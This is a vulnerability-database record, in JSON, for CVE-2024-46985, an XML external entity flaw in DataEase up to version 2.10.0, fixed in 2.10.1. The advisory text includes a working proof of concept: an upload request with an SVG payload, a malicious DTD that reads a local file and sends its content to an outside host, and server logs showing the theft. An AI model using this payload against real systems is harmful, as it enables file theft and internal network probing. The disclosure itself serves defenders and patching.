{"id":"CVE-2024-46985","aliases":["GHSA-4m9p-7xg6-f4mm"],"url":"https://o3.security/vulnerability/CVE-2024-46985","summary":"DataEase has an XXE vulnerability","details":"### Impact\nThere is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.\n\n1. send request:\n```\nPOST /de2api/staticResource/upload/1 HTTP/1.1\nHost: dataease.ubuntu20.vm\nContent-Length: 348\nAccept: application/json, text/plain, */*\nout_auth_platform: default\nX-DE-TOKEN: jwt\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn\n\n------WebKitFormBoundary6OZBNygiUCAZEbMn\nContent-Disposition: form-data; name=\"file\"; filename=\"1.svg\"\nContent-Type: a\n\n<?xml version='1.0'?>\n    <!DOCTYPE xxe [\n        <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>\n        %EvilDTD;\n        %LoadOOBEnt;\n        %OOB;\n    ]>\n------WebKitFormBoundary6OZBNygiUCAZEbMn--\n\n// 1.dtd的内容\n<!ENTITY % resource SYSTEM \"file:///etc/alpine-release\">\n        <!ENTITY % LoadOOBEnt \"<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>\">\n```\n\n2. After sending the request, the content of the file /etc/alpine-release is successfully read\n```\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /1.dtd HTTP/1.1\" 200 -\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /?content=3.20.0 HTTP/1.1\" 200 -\n```\n\nAffected versions: <= 2.10.0\n\n### Patches\nThe vulnerability has been fixed in v2.10.1.\n\n### Workarounds\nIt is recommended to upgrade the version to v2.10.1.\n\n### References\nIf you have any questions or comments about this advisory:\n\nOpen an issue in https://github.com/dataease/dataease\nEmail us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)\n","published":"2024-09-23T15:12:21.539Z","modified":"2026-08-12T03:51:15.656622813Z","cvss":{"score":7.5,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},"epss":null,"cisaKev":null,"exploitsKnown":1,"affectedPackages":[{"ecosystem":"Maven","name":"io.dataease:common","fixedVersion":"2.10.1"}],"fix":null,"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2024/46xxx/CVE-2024-46985.json"},{"type":"ADVISORY","url":"https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46985"},{"type":"PACKAGE","url":"https://github.com/dataease/dataease"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:15.656622813Z"}}